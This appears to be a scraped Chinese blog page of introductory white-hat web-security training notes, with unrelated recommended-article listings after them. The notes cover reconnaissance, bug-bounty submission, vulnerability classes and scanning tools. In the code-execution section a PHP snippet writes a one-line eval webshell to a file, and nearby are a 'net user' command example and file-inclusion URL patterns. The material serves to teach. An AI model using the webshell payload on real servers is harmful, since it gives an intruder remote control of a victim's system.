一,信息侦探技术准备工作

站长之家
搜索引擎
stie:baidu.com
inurl:baidu.com
站内侦探
//discuz论坛 https://www.***.org/space-uid-1.html
//dz 邮件找出源ip
社工库,大数据筛选
nmap.bat
nmap www.***.com -p 80
御剑
Malte go

厂商寻找

http://butian.360.cn/company/openindex
系统 后台类- **系统,平台, 管理
企业 类 - **公司,**企业,**平台

漏洞提交(白帽提交漏洞须知)

提交条件
演示
提交技巧

加密解密

md5 base64 url编码

理论

webshell exp poc 提权 渗透 远程控制 服务器
root administrator(s)
基本漏洞类型
弱口令 ***.php?info=1234
爆破 遍历
sql注入 get post cookie
xss攻击 xss.hi-ourlife.com xss平台
代码执行 命令执行 net user
文件包含 .php?include=index.php
越权
逻辑
配置错误
敏感信息泄露 site:www.*.com intext:订单

二部分 漏洞

弱口令 爆破 遍历 .
java环境安装
java一键配置
brup工具
mysql手工注入语句大全

XSS
反射 -没有过滤
存储 -
DOM

csrf原理
OWASP-CSRFTester-1.0 半自动化工具伪造工具
文件包含
本地包含 ***.com/fileiniclude.php?file=file
远程包含 ***.com/fileiniclude.php?file=http-file
挖掘 e.g www.***.com/***.php?file=


远程包含

代码执行:
实例地址:
http://localhost/subject/code-exe.php?code=code

    熟知可利用常见的php函数:phpinfo()、echo等等调试函数使用代码执行漏洞创建个webshell:<?php$file='mst.php';$person='<?php @eval($_POST[1]);?>';file_put_contents($file, $person, FILE_APPEND | LOCK_EX);



越权


文件上传-brup工具修改数据上传



三-工具

safe3wvs工具


AWVS工具
Nmap工具


中国菜刀

椰树、御剑(6款扫描工具

bugscan
BruteXSS python2.7环境


GourdScan

WEB安全白帽(一) 米斯特相关推荐

  1. 布客·ApacheCN 编程/后端/大数据/人工智能学习资源 2020.9

    公告 ApacheCN 项目的最终目标:五年内备份并翻译 Github 上的所有教程(其实快被我们啃完了,剩下的不多了). 警告各位培训班:对 ApacheCN 宣传文章的举报,也将视为对 Apach ...

  2. ApacheCN 编程/大数据/数据科学/人工智能学习资源 2019.11

    公告 我们的所有非技术内容和活动,从现在开始会使用 iBooker 这个名字. "开源互助联盟"已终止,我们对此表示抱歉和遗憾.除非特地邀请,我们不再推广他人的任何项目. 公众号自 ...

  3. ApacheCN 编程/大数据/数据科学/人工智能学习资源 2019.8

    欢迎大家在我们平台上投放广告.如果你希望在我们的专栏.文档或邮件中投放广告,请准备好各种尺寸的图片和专属链接,联系咸鱼(QQ 1034616238). 我们组织了一个开源互助平台,方便开源组织和大 V ...

  4. 使用vue-cli2.x入门简单demo游戏

    vue-cli2.x-demo 第一次使用vue-cli2.x搭建一个小demo游戏.代码文件有很多注释信息,通俗易懂的使用这个脚手架搭建一个入门小项目哈. 介绍使用 使用默认创建的脚手架: 修改Ap ...

  5. 米斯特白帽培训讲义(v2)漏洞篇 Web 中间件

    米斯特白帽培训讲义 漏洞篇 Web 中间件 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 简介 中间件是一种独立的系统软件或服务程序,分布式应用软件借助这种软件在不同的技术 ...

  6. 米斯特白帽培训讲义(v2)实战篇 捷达系统

    米斯特白帽培训讲义 实战篇 捷达系统 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 概述 官网:http://www.jeedaa.com/ 主要产品有: 捷达ERP 捷达 ...

  7. 米斯特白帽培训讲义(v2)漏洞篇 SSRF

    米斯特白帽培训讲义 漏洞篇 SSRF 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 很多 Web 应用都提供了从其他服务器上获取数据的功能.使用用户指定的 URL,web ...

  8. 米斯特白帽培训讲义(v2)信息收集

    米斯特白帽培训讲义 信息收集 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 收集什么? Whois信息 注册人名字.邮箱等 IP信息(服务器的IP) 判断是否为CDN节点, ...

  9. 米斯特白帽培训讲义(v2)漏洞篇 第三方风险

    米斯特白帽培训讲义 漏洞篇 第三方风险 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 域名商 域名商就是提供域名购买的站点.我们可以通过站长工具的 WHOIS 查询来查询域 ...

最新文章

  1. selenium的基础知识点
  2. leetcode算法题--替换空格
  3. 三星T5 SSD制作ubuntu18.04随身携带即插即用与win10共享文件真爽~(简单粗暴安装大法一步到位)
  4. POJ1942-Paths On a Grid-组合数学
  5. 使用Core Audio实现VoIP通用音频模块
  6. 零基础入门 HTML 的 8 分钟极简教程
  7. oracle立即关闭数据库,Oracle数据库的起步和关闭
  8. javaScript一种优化模式-初始化时分支
  9. python使用布隆过滤器筛选数据
  10. ubuntu lvm mysql vg_使用LVM快照做mysql完全备份和lvm的扩容
  11. PAT B1035 插入与归并 (25 分)
  12. JSP期末考试复习习题及答案
  13. demonstration记忆_单词记忆法
  14. 大学生集体恶搞学士服猥琐拍照,谁羞辱了谁?!(图)
  15. 算法(字符串)——重复的子字符串
  16. 网页设计-动态雪花背景源码
  17. 尝试编写一个加密程序,加密方法将明文的字母变成其后的第4个字母,**字母表首尾相连。非字母符号** 不加密。 例如输入“China“, 输出密文“Glmre“, 输入 “ab123“, 输出 “ef1
  18. 布局云计算的下一个主场,紫光云引领行业云三大趋势
  19. VIM设置,自动换行
  20. VLAN的划分方法有哪些?

热门文章

  1. Module not found: Error: Can‘t resolve ‘react-dom/client‘
  2. 群晖7.X系统Video Station不支持视频格式的解决方案
  3. 为什么镜像电流源为什么要把c和E极接一条导线
  4. php开发的抽奖系统源码,幸运九宫格类型的,带后台可控制
  5. A_Prn_Barcode 应用code128码的 注意事项
  6. 基于Conv3D和LSTM的出租车流量预测
  7. 【SQL Server】数据库开发指南(五)T-SQL 高级查询综合应用与实战
  8. 【新版】Inventor二次开发学习指南
  9. Inventor 二次开发 - Gear Up Inventor 分享 Inventor 二次开发 的资料和经验
  10. [python爬虫] BeautifulSoup爬取+CSV存储贵州农产品数据